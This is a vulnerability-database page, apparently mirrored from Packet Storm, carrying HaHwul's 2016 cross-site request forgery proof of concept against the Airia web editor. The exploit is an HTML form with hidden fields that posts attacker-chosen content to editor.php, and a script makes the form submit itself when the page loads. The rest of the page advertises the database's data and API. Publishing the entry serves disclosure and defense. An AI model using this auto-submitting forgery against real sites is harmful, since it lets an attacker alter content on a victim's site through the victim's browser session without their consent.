Lucene search
K

Airia Cross Site Request Forgery

🗓️ 20 Jun 2016 00:00:00Reported by HaHwulType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Airia CSRF Vulnerability, form submission to add conten

Code
`<!--  
# Exploit Title: Airia - CSRF Vulnerability(Add content)  
# Date: 2016-06-20  
# Exploit Author: HaHwul  
# Exploit Author Blog: www.hahwul.com  
# Vendor Homepage: http://ytyng.com  
# Software Link: https://github.com/ytyng/airia/archive/master.zip  
# Version: Latest commit  
# Tested on: Debian [wheezy]  
-->  
  
<form name="csrf_poc" action="http://127.0.0.1/vul_test/airia/editor.php" method="POST">  
<input type="hidden" name="mode" value="save">  
<input type="hidden" name="file" value="1">  
<input type="hidden" name="scrollvalue" value="">  
<input type="hidden" name="contents" value="CSRF Attack">  
<input type="hidden" name="group" value="1">  
  
<input type="submit" value="Replay!">  
</form>  
<script type="text/javascript">document.forms.csrf_poc.submit();</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation